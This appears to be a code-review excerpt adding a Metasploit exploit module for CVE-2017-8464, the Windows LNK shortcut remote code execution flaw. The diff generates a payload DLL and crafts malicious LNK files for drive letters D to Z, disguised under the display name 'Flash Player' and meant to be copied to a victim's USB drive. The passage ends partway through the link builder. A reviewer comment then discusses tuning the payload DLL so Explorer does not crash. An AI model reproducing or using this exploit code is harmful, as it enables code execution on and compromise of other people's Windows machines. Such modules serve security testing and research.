modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

```diff
@@ -0,0 +1,204 @@
+          ['CVE', '2017-8464'],
+          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
+          ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
+          ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
+          ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
+          ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC'    => 'process',
+        },
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Payload'         =>
+        {
+          'Space'       => 2048,
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 64-bit
+      'DisclosureDate'  => 'Jun 13 2017'))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [false, 'The LNK file']),
+        OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
+        OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+      ])
+  end
+
+  def exploit
+    dll = generate_payload_dll
+    dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
+    dll_path = store_file(dll, dll_name)
+    print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
+
+    if datastore['DRIVE']
+      lnk = generate_link("#{datastore['DRIVE']}:\\#{dll_name}")
+      lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
+      lnk_path = store_file(lnk, lnk_filename)
+      print_status("#{lnk_path} created, copy to the target USB drive")
+    else
+      # HACK the vulnerability doesn't appear to work with UNC paths
+      # Create LNK files to different drives instead
+      # Copying all the LNK files will likely trigger this vulnerability
+      ('D'..'Z').each do |i|
+        lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
+        if lnk_filename =~ /(.*)\.(.*)/
+          lnk_filename = "#{$1}_#{i}.#{$2}"
+        else
+          lnk_filename = "#{lnk_filename}_#{i}.lnk"
+        end
+        lnk = generate_link("#{i}:\\#{dll_name}")
+        lnk_path = store_file(lnk, lnk_filename)
+        print_status("#{lnk_path} created, copy to the target USB drive")
+      end
+    end
+  end
+
+  def generate_link(path)
+    path << "\x00"
+    display_name = "Flash Player\x00" # LNK Display Name
+    comment = "\x00"
+
+    # Control Panel Applet ItemID with our DLL
+    cpl_applet = [
```

Comment:
There is almost no documentation about this structure. At least not that I could find.

With regards to crashing of Explorer, there is an explicit ExitThread(0) in the template DLL. I think this causes the crashes. If I patch it out, Explorer doesn't crash, but the payload runs multiple times. I guess I'll have to replace the template DLLs with my own. See also: https://github.com/rapid7/metasploit-framework/blob/master/data/templates/src/pe/dll/template.c